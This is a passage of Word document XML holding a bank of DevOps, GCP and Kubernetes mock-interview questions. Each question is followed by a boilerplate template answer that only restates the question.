        <w:t>A: A strong answer should directly address the Linux/System Administration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A RHEL/Linux server has high CPU, low disk space, and failing systemd services. How would you investigate and restore service health?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. You are on-call during a major outage affecting a CSAT service. How would you lead detection, mitigation, communication, escalation, and RCA?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Incident Management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You are on-call during a major outage affecting a CSAT service. How would you lead detection, mitigation, communication, escalation, and RCA?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. How do you plan and execute production changes in a regulated enterprise environment while minimizing risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Change Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Change Management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plan and execute production changes in a regulated enterprise environment while minimizing risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Design a CI/CD pipeline using GitHub, JIRA, Jenkins, and Ansible for build, test, deployment, approvals, rollback, and auditability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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Design a CI/CD pipeline using GitHub, JIRA, Jenkins, and Ansible for build, test, deployment, approvals, rollback, and auditability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How have you used Terraform and Ansible together, and where would you draw the boundary between provisioning and configuration management?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Infrastructure as Code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Infrastructure as Code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have you used Terraform and Ansible together, and where would you draw the boundary between provisioning and configuration management?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you implement secrets management with HashiCorp Vault or cloud secret managers for applications running in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Secrets Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Secrets Management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implement secrets management with HashiCorp Vault or cloud secret managers for applications running in Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Compare Deployment, StatefulSet, and DaemonSet. When would you use each in an enterprise platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Containers/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Containers/Kubernetes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Compare Deployment, StatefulSet, and DaemonSet. When would you use each in an enterprise platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How would you use Splunk, AppDynamics, and xMatters to monitor services, reduce alert noise, and proactively prevent outages?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability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use Splunk, AppDynamics, and xMatters to monitor services, reduce alert noise, and proactively prevent outages?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. What SQL or database troubleshooting experience do you have with PostgreSQL or MSSQL, especially for connectivity, slow queries, or locks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SQL/Database Operations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the SQL/Database Operations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SQL or database troubleshooting experience do you have with PostgreSQL or MSSQL, especially for connectivity, slow queries, or locks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. A service in GKE cannot connect to a database or third-party endpoint. How would you troubleshoot DNS, routes, firewalls, security groups, and application configuration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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A service in GKE cannot connect to a database or third-party endpoint. How would you troubleshoot DNS, routes, firewalls, security groups, and application configuration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. What security controls would you add across CI/CD, containers, Kubernetes, cloud IAM, secrets, logging, and audit trails?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>DevSecOps/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the DevSecOps/Security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security controls would you add across CI/CD, containers, Kubernetes, cloud IAM, secrets, logging, and audit trails?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Tell me about a time you automated a manual operations task or improved a workflow. What was the impact, and how did you share the learning with the team?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Behavioral/Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Behavioral/Automation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Tell me about a time you automated a manual operations task or improved a workflow. What was the impact, and how did you share the learning with the team?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 61 - Resilinc GCP Production Incident Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Starting point, staying on GCP support when a production issue hits networking, storage, or security. What is your usual step-by-step approach to isolate whether it is a platform problem, an application problem, or something in IAM or VPC configuration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Support</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP Support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Starting point, staying on GCP support when a production issue hits networking, storage, or security. What is your usual step-by-step approach to isolate whether it is a platform problem, an application problem, or something in IAM or VPC configuration?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What alerts or dashboards have you personally built or tuned?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability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alerts or dashboards have you personally built or tuned?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Can you walk me through one case where the alert fired but the real issue was something different from what the metric suggested?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability/Incident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability/Incident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Can you walk me through one case where the alert fired but the real issue was something different from what the metric suggested?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Walk me through a production Kubernetes issue you handled where a pod or deployment was failing. Tell me exactly how you diagnosed it from the first symptom to the fix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Kubernetes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Walk me through a production Kubernetes issue you handled where a pod or deployment was failing. Tell me exactly how you diagnosed it from the first symptom to the fix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What have you actually built with Terraform in GCP? Can you walk me through a real module or stack you owned end-to-end?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform/GCP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform/GCP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have you actually built with Terraform in GCP? Can you walk me through a real module or stack you owned end-to-end?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. In a GCP environment, how have you designed IAM or VPC security so that teams could move fast without opening things up too much? What trade-off did you have to make?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IAM/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the IAM/Security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In a GCP environment, how have you designed IAM or VPC security so that teams could move fast without opening things up too much? What trade-off did you have to make?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Tell me about a production outage you worked on. What was the root cause? What did you change afterward to prevent it from happening again?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Production Outage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Production Outage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Tell me about a production outage you worked on. What was the root cause? What did you change afterward to prevent it from happening again?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Pick one actual incident you handled in GCP. Walk me through the exact failure, how you found the root cause, and what the post-incident change was.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Incident/RCA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP Incident/RCA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Pick one actual incident you handled in GCP. Walk me through the exact failure, how you found the root cause, and what the post-incident change was.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How would you troubleshoot Kubernetes networking issues involving CNI, Services, and Ingress?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes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troubleshoot Kubernetes networking issues involving CNI, Services, and Ingress?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Explain Docker internals that matter during production troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Docker Internals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Docker Internals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Docker internals that matter during production troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How would you troubleshoot Kafka producer, broker, consumer lag, and consumer group issues?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kafka Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kafka Troubleshooting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troubleshoot Kafka producer, broker, consumer lag, and consumer group issues?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How would you design and troubleshoot PostgreSQL high availability and backup/restore?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PostgreSQL HA/Backup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the PostgreSQL HA/Backup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design and troubleshoot PostgreSQL high availability and backup/restore?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. How would you troubleshoot GitHub Actions or CI/CD pipeline failures in production delivery?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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troubleshoot GitHub Actions or CI/CD pipeline failures in production delivery?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. What Grafana and Prometheus dashboards would you build for production support?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability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Grafana and Prometheus dashboards would you build for production support?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. How do you manage Terraform state, modules, locking, drift, and safe production changes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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manage Terraform state, modules, locking, drift, and safe production changes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Explain how you have used GKE, IAM, VPC, Cloud SQL, and Load Balancer in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP Services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how you have used GKE, IAM, VPC, Cloud SQL, and Load Balancer in production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. How do you troubleshoot Linux CPU, memory, disk, network, and process issues during an incident?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux Troubleshooting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troubleshoot Linux CPU, memory, disk, network, and process issues during an incident?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. How do you handle production incidents and write an RCA?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Incident Handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Incident Handling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handle production incidents and write an RCA?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. Design scalable cloud infrastructure for a production application on GCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the System Design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Design scalable cloud infrastructure for a production application on GCP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 62 - Complete DevOps GCP Kubernetes Screening Bank</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Walk me through your current role at Capgemini.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Experience &amp; Background</w:t>
